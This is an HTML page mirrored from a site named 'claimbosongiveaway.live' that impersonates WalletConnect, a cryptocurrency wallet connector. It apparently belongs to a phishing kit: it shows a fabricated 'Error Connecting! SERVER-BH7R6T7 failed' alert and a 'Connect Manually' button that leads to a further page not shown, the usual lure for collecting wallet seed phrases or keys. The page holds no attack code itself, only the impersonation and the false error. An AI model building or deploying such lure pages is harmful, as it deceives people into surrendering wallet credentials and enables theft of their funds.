<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from claimbosongiveaway.live/apiv4wc-connectionv3/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Dec 2023 01:26:17 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="dist/flowbite.min.css" />
    <link rel="stylesheet" href="dist/inter/inter.css">
    <script src="https://cdn.tailwindcss.com/"></script>
    <script src="https://cdn.tailwindcss.com/?plugins=forms,typography,aspect-ratio,line-clamp"></script>
</head>
<body style="background-color:#08081c">
    <section class="">
        <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
            <a href="index.html" class="flex items-center font-bold text-white">
                <img src="wc1.png" class="mr-3  mb-5" style="height:30px" alt="Logo">
                <span>Walletconnect</span>
            </a>
            <div style="background-color: rgb(238, 232, 232)" class="p-4 animate-pulse text mb-4 text-sm text-red-900 rounded-lg dark:bg-blue-200 dark:text-blue-800" role="alert">
                <span class="font-medium text-red-900">
                   Error Connecting! SERVER-BH7R6T7 failed.
                </span><b class="text-red-900">Try Connecting manually</b>
              </div> 

              <a href="index4.html" class="mt-5 text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">
                Connect Manually</a>

              
           



              

              </div>               

      
      </section>






    <script src="dist/flowbite.js"></script>
</body>

<!-- Mirrored from claimbosongiveaway.live/apiv4wc-connectionv3/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Dec 2023 01:26:18 GMT -->
</html>